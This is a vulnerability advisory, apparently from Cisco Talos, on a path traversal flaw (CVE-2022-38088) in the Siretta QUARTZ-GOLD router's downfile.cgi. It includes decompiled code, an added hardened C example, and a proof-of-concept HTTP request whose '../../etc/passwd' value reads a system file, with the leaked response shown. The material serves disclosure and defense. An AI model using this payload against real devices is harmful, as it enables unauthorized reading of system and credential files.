# Talos Vulnerability Report
### TALOS-2022-1609
## Siretta QUARTZ-GOLD httpd downfile.cgi directory traversal vulnerability
##### January 26, 2023
##### CVE Number
CVE-2022-38088
##### SUMMARY
A directory traversal vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.
##### CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020
##### PRODUCT URLS
QUARTZ-GOLD –
##### CVSSv3 SCORE
4.9 – CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
##### CWE
CWE-22 – Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal")
##### DETAILS
The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.
The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.
Following is the API to download a previously uploaded file:

```c
void downfile.cgi(void)
{
[…]
    _filename_param = (char *)webcgi_safeget("_filename"); [1]
    filename = "";
    if (_filename_param != (char *)0x0) {
        filename = _filename_param;
    }
    [… calculate base_folder …]
    if (*filename != '\0') {
        sprintf(buff, "Content-Disposition:attachment;filename=\"%s\"", (char *)filename);
        send_header(200, buff, "application/tomato-binary-file", 0);
        sprintf(buff, "%s/%s", base_folder, filename); [2]
        do_file(buff); [3]
    }
    return;
}
```
The `downfile.cgi` handler expects one parameter called `_filename` that represents the name of the file to be downloaded. At `[1]` the supplied parameter is read and then used at `[2]` to compose the string `base_folder/filename`. Then, at `[3]`, the specified file is sent in the HTTP response. Between `[1]` and `[2]` no sanitization of the `_filename` parameter is performed, which leads to a path traversal vulnerability, allowing an attacker to download any file on the file system.
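The following is an added example, not Siretta's code or part of the original report. It contrasts the unchecked `"%s/%s"` composition at `[2]` with a hardened version that accepts only a plain file name, and adds a canonical-path containment check as defense in depth. The function names (`safe_basename`, `build_download_path`, `path_within_base`, `resolve_within_base`) and the sample base folder `/tmp/uploads` are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <limits.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* Added example: hardened replacement for the path composition in
 * downfile.cgi. All function names and the "/tmp/uploads" base folder
 * are assumptions for illustration, not Siretta code. */

/* Naive composition, mirroring sprintf(buff, "%s/%s", base_folder, filename)
 * at [2]: nothing is checked, so "../../etc/passwd" escapes base_folder. */
int naive_build_path(const char *base_folder, const char *filename,
                     char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s/%s", base_folder, filename);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Returns 1 if name is a single, plain path component: non-empty, not "."
 * or "..", no '/' or '\\', and no control characters (which would also let
 * the value break out of the Content-Disposition header). */
int safe_basename(const char *name)
{
    if (name == NULL || *name == '\0') return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++) {
        if (*p == '/' || *p == '\\' || *p < 0x20 || *p == 0x7f) return 0;
    }
    return 1;
}

/* Hardened composition: refuse anything but a plain file name, then join.
 * Returns 0 and fills out on success, -1 when the name is rejected. */
int build_download_path(const char *base_folder, const char *filename,
                        char *out, size_t outlen)
{
    if (!safe_basename(filename)) return -1;
    return naive_build_path(base_folder, filename, out, outlen);
}

/* Defense in depth on already-canonical absolute paths: 1 if path lies
 * strictly inside base (base "/srv/files" must not match "/srv/files2/x"). */
int path_within_base(const char *base, const char *path)
{
    size_t blen = strlen(base);
    if (blen == 0 || base[0] != '/' || path[0] != '/') return 0;
    if (strcmp(base, "/") == 0) return path[1] != '\0';
    if (strncmp(path, base, blen) != 0) return 0;
    return path[blen] == '/' && path[blen + 1] != '\0';
}

/* Canonicalise with realpath(3), which follows symlinks and requires the
 * target to exist, then confirm the file still lies under the base folder.
 * Returns 0 and fills resolved on success, -1 otherwise. */
int resolve_within_base(const char *base_folder, const char *candidate,
                        char *resolved, size_t rlen)
{
    char rbase[PATH_MAX], rpath[PATH_MAX];
    if (realpath(base_folder, rbase) == NULL) return -1;
    if (realpath(candidate, rpath) == NULL) return -1;
    if (!path_within_base(rbase, rpath)) return -1;
    if (strlen(rpath) >= rlen) return -1;
    strcpy(resolved, rpath);
    return 0;
}

int main(void)
{
    char buf[PATH_MAX];
    const char *base = "/tmp/uploads";      /* constructed sample base folder */
    const char *evil = "../../etc/passwd";  /* the _filename value from the PoC */

    naive_build_path(base, evil, buf, sizeof buf);
    printf("naive:    %s\n", buf);
    printf("hardened: %s\n",
           build_download_path(base, evil, buf, sizeof buf) == 0 ? buf : "rejected");
    return 0;
}
```

The lexical check alone closes the traversal shown in the PoC; the `realpath` check catches symlinks planted through the upload API or other means, which a string check cannot see.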
### Exploit Proof of Concept
Sending the following request to the web server:

```
POST /downfile.cgi HTTP/1.1
Authorization: Basic
Content-Length: 55

_filename=../../etc/passwd&_http_id=
```
would result in the web server sending the following response:

```
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2000 03:33:42 GMT
Content-Type: application/tomato-binary-file
Cache-Control: no-cache, no-store, must-revalidate, private
Expires: Thu, 31 Dec 1970 00:00:00 GMT
Pragma: no-cache
Content-Disposition:attachment;filename="../../etc/passwd"
Connection: close

root:x:0:0:root:/root:/bin/sh
admin:x:0:0:admin:/root:/bin/sh
nobody:x:65534:65534:nobody:/dev/null:/dev/null
```

The response body for this request is the contents of `/etc/passwd`.
##### TIMELINE
2022-10-14 – Initial Vendor Contact
2022-10-20 – Vendor Disclosure
2022-11-24 – Vendor Patch Release
2023-01-26 – Public Release
##### Credit
Discovered by Francesco Benvenuto of Cisco Talos.